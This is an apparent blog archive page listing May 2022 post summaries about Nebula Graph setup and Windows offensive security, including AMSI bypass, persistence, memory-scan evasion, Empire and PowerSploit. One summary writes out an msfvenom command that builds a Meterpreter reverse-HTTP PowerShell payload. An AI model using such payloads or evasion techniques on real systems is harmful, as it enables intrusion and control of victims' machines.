05 2022 档案

摘要:写在前面,根因问题是我下载了spark without hadoop版本导致,应该使用spark with hadoop 版本!!! 参考步骤:https://docs.nebula-graph.com.cn/3.1.0/nebula-algorithm/#_2 错误: 2022-05-31 17: 阅读全文
posted @ 2022-05-30 18:17 bonelee 阅读(3) 评论(0) 推荐(0) 编辑
摘要:(root@nebula) [(none)]> show hosts graph + + + + + + + | Host | Port | Status | Role | Git Info Sha | Version | + + + + + + + | "127.0.0.1" | 9669 | " 阅读全文
posted @ 2022-05-30 17:51 bonelee 阅读(426) 评论(0) 推荐(0) 编辑
摘要:Error: Unable to initialize main class org.apache.spark.deploy.SparkSubmit Caused by: java.lang.NoClassDefFoundError: org/slf4j/Logger How to install 阅读全文
posted @ 2022-05-30 17:04 bonelee 阅读(1147) 评论(0) 推荐(0) 编辑
摘要:手动部署 更改配置文件,将etc目录下的nebula-xxxx-conf.default改名或者copy为nebula-xxxx-conf。 查看端口是否有被占用: nebula三个服务的默认端口:9559、9669、9779; 对应的三个http端口:19559、19669、19779; 三个ht 阅读全文
posted @ 2022-05-30 15:55 bonelee 阅读(314) 评论(0) 推荐(0) 编辑
摘要:linux 树型显示文件 tree 命令 sudo apt install tree 效果: tree . . ├── doc │ └── algorithm_test.md ├── example │ ├── pom.xml │ └── src │ └── main │ ├── resources 阅读全文
posted @ 2022-05-30 14:50 bonelee 阅读(258) 评论(0) 推荐(0) 编辑
摘要:https://docs.nebula-graph.com.cn/3.1.0/nebula-analytics/ Nebula Analytics¶ Nebula Analytics 是一款高性能图计算框架工具,支持对 Nebula Graph 数据库中的数据执行图分析。 Enterpriseonl 阅读全文
posted @ 2022-05-30 14:35 bonelee 阅读(1161) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2022-05-26 16:02 bonelee 阅读(629) 评论(0) 推荐(0) 编辑
摘要:格式 [命令] [定义组] [组名] [定义成员] [成员列表] 注意:成员列表需要使用 SamAccountName 属性;注意:该删除不仅从组删除成员,并且将用户同时删除; 命令 remove-adgroupmember -identity ITGroup -members hexiaohan, 阅读全文
posted @ 2022-05-25 10:53 bonelee 阅读(474) 评论(0) 推荐(0) 编辑
摘要:写在前面: nebula-algorithm 目前仅支持 Nebula Graph v1.x,不支持 Nebula Graph v2.x。 这玩意是不是有大坑啊! 我看1.21以下都不支持了。。。 图计算之 nebula-algorithm 在开始 nebula-algorithm 介绍之前,先贴一 阅读全文
posted @ 2022-05-24 21:00 bonelee 阅读(1303) 评论(0) 推荐(0) 编辑
摘要:MATCH¶ MATCH语句提供基于模式(pattern)匹配的搜索功能。 一个MATCH语句定义了一个搜索模式,用该模式匹配存储在 Nebula Graph 中的数据,然后用RETURN子句检索数据。 本文示例使用测试数据集 basketballplayer 进行演示。 我自己最喜欢用的是: (r 阅读全文
posted @ 2022-05-24 18:28 bonelee 阅读(1454) 评论(0) 推荐(0) 编辑
摘要:什么是 nGQL¶ nGQL(Nebula Graph Query Language)是 Nebula Graph 使用的的声明式图查询语言,支持灵活高效的图模式,而且 nGQL 是为开发和运维人员设计的类 SQL 查询语言,易于学习。 nGQL 是一个进行中的项目,会持续发布新特性和优化,因此可能 阅读全文
posted @ 2022-05-24 12:00 bonelee 阅读(1284) 评论(2) 推荐(0) 编辑
摘要:摘自nGQL指南,加入了自己实践补充 https://docs.nebula-graph.com.cn/3.1.0/3.ngql-guide/1.nGQL-overview/1.overview/ 快速入门¶ 快速入门将介绍如何简单地使用 Nebula Graph,包括部署、连接 Nebula Gr 阅读全文
posted @ 2022-05-23 20:45 bonelee 阅读(1000) 评论(0) 推荐(0) 编辑
摘要:什么是 Nebula Graph¶ Nebula Graph 是一款开源的、分布式的、易扩展的原生图数据库,能够承载包含数千亿个点和数万亿条边的超大规模数据集,并且提供毫秒级查询。 什么是图数据库¶ 图数据库是专门存储庞大的图形网络并从中检索信息的数据库。它可以将图中的数据高效存储为点(Vertex 阅读全文
posted @ 2022-05-23 18:24 bonelee 阅读(2183) 评论(1) 推荐(0) 编辑
摘要:宏病毒的简单分析 PUBLISHED 2017-01-16 BY LIWZ11 Office是一款应用广泛的办公软件,它允许在文档中使用功能强大的可执行指令,也就是宏代码。然而,宏代码带来便利的同时,也使得病毒的制造与传播更加容易。正所谓想要瓦解敌人,一定要从内部开始,所以从Word宏病毒的实现入手 阅读全文
posted @ 2022-05-18 19:20 bonelee 阅读(302) 评论(0) 推荐(0) 编辑
摘要:1. 恶意文件形式:基于宏 (1)落地形式 非PE的间接文件:A、基于宏(类型III:Offic文档、PDF文档) 在默认的情况下,Word将宏存贮在 Normal模板中,以便所有的Word文档均能使用,这一特点几乎为所有的宏病毒所利用。 如果撰写了有问题的宏,感染了通用模板(Normal.dot) 阅读全文
posted @ 2022-05-18 14:20 bonelee 阅读(3923) 评论(0) 推荐(0) 编辑
摘要:权力的游戏中的人物关系 Xiaolang & Zhangkun & Wangjie 2021-11-01 playground 在本数据集中,我们将使用可视化图探索工具 Nebula Explorer ,探索“权力的游戏”公开的数据关系。 数据集样例: person Addam-Marbrand,3 阅读全文
posted @ 2022-05-18 11:14 bonelee 阅读(632) 评论(0) 推荐(0) 编辑
摘要:核心隔离 核心隔离是 Microsoft Windows的一项安全功能,它通过将重要的核心Windows与恶意软件隔离在内存中来保护这些进程。 为此,它会在虚拟化环境中运行这些核心进程。 内存完整性 内存完整性也称为虚拟机监控程序保护的代码完整性 (HVCI) 是 Windows 安全功能,使恶意程 阅读全文
posted @ 2022-05-16 13:14 bonelee 阅读(25255) 评论(0) 推荐(0) 编辑
摘要:0X01工控系统漏洞存在现状和不足 目前工控系统安全与传统IT系统安全不同有以下几点原因: 一、从安全优先级来说: 1.工控系统网络安全焦点问题是生产过程稳定可靠,强调的是可用性,不能停产,不能发生生产安全事故。 2.工控系统网络通讯协议不同,大量的工控系统采用私有协议。 3.系统运行环境不同,工控 阅读全文
posted @ 2022-05-15 17:54 bonelee 阅读(1336) 评论(0) 推荐(0) 编辑
摘要:功能特性 描述 Metasploit Framework Metasploit Community Metasploit Express Metasploit Pro Pricing License 无IP限制 Free Free 收费 收费 用户界面 Web界面 提供友好的web界面,大大提高效率 阅读全文
posted @ 2022-05-15 17:08 bonelee 阅读(177) 评论(0) 推荐(0) 编辑
摘要:站点名称 网址 数据规模(千)Metasploit www.metasploit.com/modules/ 0.1~1Exploit-db www.exploit-db.com 1~10PacketStorm packetstormsecurity.org 10~100SecurityFocus w 阅读全文
posted @ 2022-05-15 16:58 bonelee 阅读(89) 评论(0) 推荐(0) 编辑
摘要:Hunting In Memory 作者 Joe Desimone 分享 Editor’s Note: Elastic joined forces with Endgame in October 2019, and has migrated some of the Endgame blog cont 阅读全文
posted @ 2022-05-11 15:57 bonelee 阅读(242) 评论(0) 推荐(0) 编辑
摘要:使用Cobalt Strike和Gargoyle绕过杀软的内存扫描 https://www.4hou.com/posts/lpkM 丝绸之路 勒索软件 2019-02-20 09:58:17 收藏 导语:本文将主要介绍我在Cobalt Strike的Beacon有效载荷和gargoyle内存扫描规避 阅读全文
posted @ 2022-05-11 14:45 bonelee 阅读(520) 评论(0) 推荐(0) 编辑
摘要:https://help.eset.com/glossary/zh-CN/technology_network_attack_protection.html?technology_sbap.html 高级内存扫描程序 高级内存扫描程序与漏洞利用阻止程序结合使用以增强对恶意软件的防范,后者旨在通过迷惑 阅读全文
posted @ 2022-05-11 11:50 bonelee 阅读(1034) 评论(0) 推荐(0) 编辑
摘要:一文讲解API网关核心功能 【编者的话】本文详细讲解了API网关的基础概念,使用场景和核心功能,以及基于API网关核心引擎做的API全生命周期管理功能扩展等,最好再介绍下当前主流的开源API网关引擎。 API网关概述 在微服务架构体系里面,我们一般会使用到微服务网关或叫API网关。 大家都比较清楚, 阅读全文
posted @ 2022-05-09 20:30 bonelee 阅读(1834) 评论(0) 推荐(0) 编辑
摘要:写在前面,我自己的操作: kali下: msfvenom -p windows/x64/meterpreter_reverse_http -f psh -o m64.ps1 LHOST=192.168.0.112msfconsole里: msf6 > use exploit/multi/handle 阅读全文
posted @ 2022-05-06 20:59 bonelee 阅读(737) 评论(0) 推荐(0) 编辑
摘要:PSattack:一个渗透测试中使用的万能框架 嘶吼RoarTalk 网络安全观察者 导语:这段时间以来,以powershell为载体,大牛们开发出了很多有趣的东西。比如Invoke-Phant0m日志清除器就在其中。这篇文章就是用来讲述一个将这些渗透测试脚本集合起来的框架:PSattack。 什么 阅读全文
posted @ 2022-05-06 16:52 bonelee 阅读(135) 评论(0) 推荐(0) 编辑
摘要:Window下常见的权限维持方式 系统安全 Bypass007 2019-12-10 10,297 在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自 阅读全文
posted @ 2022-05-06 16:31 bonelee 阅读(68) 评论(0) 推荐(0) 编辑
摘要:Window权限维持(五):屏幕保护程序 Web安全 Bypass007 2019-12-04 10,068 屏幕保护是Windows功能的一部分,使用户可以在一段时间不活动后放置屏幕消息或图形动画。众所周知,Windows的此功能被威胁参与者滥用为持久性方法。这是因为屏幕保护程序是具有.scr文件 阅读全文
posted @ 2022-05-06 16:30 bonelee 阅读(152) 评论(0) 推荐(0) 编辑
摘要:Window权限维持(一):注册表运行键 资讯 Bypass007 2019-11-11 6,056 译文声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 原文地址:https://pentestlab.blog/2019/10/01/persistence-registry-run- 阅读全文
posted @ 2022-05-06 16:28 bonelee 阅读(64) 评论(0) 推荐(0) 编辑
摘要:Window权限维持(三):新服务 系统安全 Bypass007 2019-12-04 7,159 如果未正确配置Windows环境中的服务或这些服务可以用作持久性方法,则这些服务可能导致权限提升。创建一个新的服务需要管理员级别的特权,它已经不是隐蔽的持久性技术。然而,在红队的行动中,针对那些在威胁 阅读全文
posted @ 2022-05-06 16:28 bonelee 阅读(31) 评论(0) 推荐(0) 编辑
摘要:Window权限维持(四):快捷方式 系统安全 Bypass007 2019-12-04 8,935 Windows快捷方式包含对系统上安装的软件或文件位置(网络或本地)的引用。自从恶意软件出现之初,便已将快捷方式用作执行恶意代码以实现持久性的一种方法。快捷方式的文件扩展名是.LNK,它为红队提供了 阅读全文
posted @ 2022-05-06 16:24 bonelee 阅读(224) 评论(0) 推荐(0) 编辑
摘要:原文:https://blog.csdn.net/qq_27446553/article/details/50511373 0x00 简介 通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows 阅读全文
posted @ 2022-05-06 09:59 bonelee 阅读(1069) 评论(0) 推荐(0) 编辑
摘要:Empire的基本使用和域渗透 一、Empire简介 ​ Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能, 阅读全文
posted @ 2022-05-05 17:57 bonelee 阅读(762) 评论(0) 推荐(0) 编辑
摘要:一、前言 Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够 阅读全文
posted @ 2022-05-05 17:56 bonelee 阅读(206) 评论(0) 推荐(0) 编辑
摘要:安全工具 | PowerSploit使用介绍 2021-05-11阅读 7750 目录 PowerSploit PowerSploit的用法 PowerView.ps1脚本的使用 PowerUp.ps1脚本的使用 Invoke-Allchecks模块 Invoke-NinjaCopy.ps1脚本的使 阅读全文
posted @ 2022-05-04 22:19 bonelee 阅读(332) 评论(0) 推荐(0) 编辑
摘要:powersploit使用方法 一、PowerSploit简介 PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。 Powershell的优点: 1.代码运行在内存中可以不去接触磁盘 2.从另一个系统中 阅读全文
posted @ 2022-05-04 22:17 bonelee 阅读(946) 评论(0) 推荐(0) 编辑
摘要:AMSI 浅析及绕过 0x00 前言 0x01 AMSI浅析 1、什么是AMSI? AMSI(Antimalware Scan Interface),即反恶意软件扫描接口,在windows 10和 windows server 2016上默认安装并启用。顾名思义,他的工作就是扫描、检测和阻止。win 阅读全文
posted @ 2022-05-04 18:57 bonelee 阅读(591) 评论(0) 推荐(0) 编辑
摘要:写在前面的话 16年文章,原始出处:https://blog.csdn.net/SAKAISON/article/details/52637903 上个月,我在2016美国Black Hat黑客大会上讨论了一些关于微软反恶意软件扫描接口(AMSI)的内容。那场演讲和这篇文章中的内容是我对AMSI的一 阅读全文
posted @ 2022-05-04 18:29 bonelee 阅读(356) 评论(0) 推荐(0) 编辑
摘要:PowerShell攻防进阶篇:nishang工具用法详解 嘶吼RoarTalk 网络安全观察者 导语:nishang,PowerShell下并肩Empire,Powersploit的神器。 开始之前,先放出个下载地址! 下载地址:samratashok/nishang 1.简介 Nishang是一 阅读全文
posted @ 2022-05-04 17:59 bonelee 阅读(935) 评论(0) 推荐(0) 编辑
摘要:Heap Spray原理浅析 Magictong 2012/03 摘要:本文主要介绍Heap Spray的基本原理和特点、以及防范技术。 关键词:Heap Spray、溢出攻击、漏洞利用、堆溢出 Heap Spray定义基本描述 Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一 阅读全文
posted @ 2022-05-04 12:26 bonelee 阅读(183) 评论(0) 推荐(0) 编辑
摘要:PS C:\Users\bonel\Desktop\nishang-master> Get-Help Bypass -fullnishang脚本,使用众所周知的方法绕过/避免AMSI。语法 调用AmsiBypass[[-Method]<String>[[-ShowOnly][<CommonParam 阅读全文
posted @ 2022-05-04 10:27 bonelee 阅读(136) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示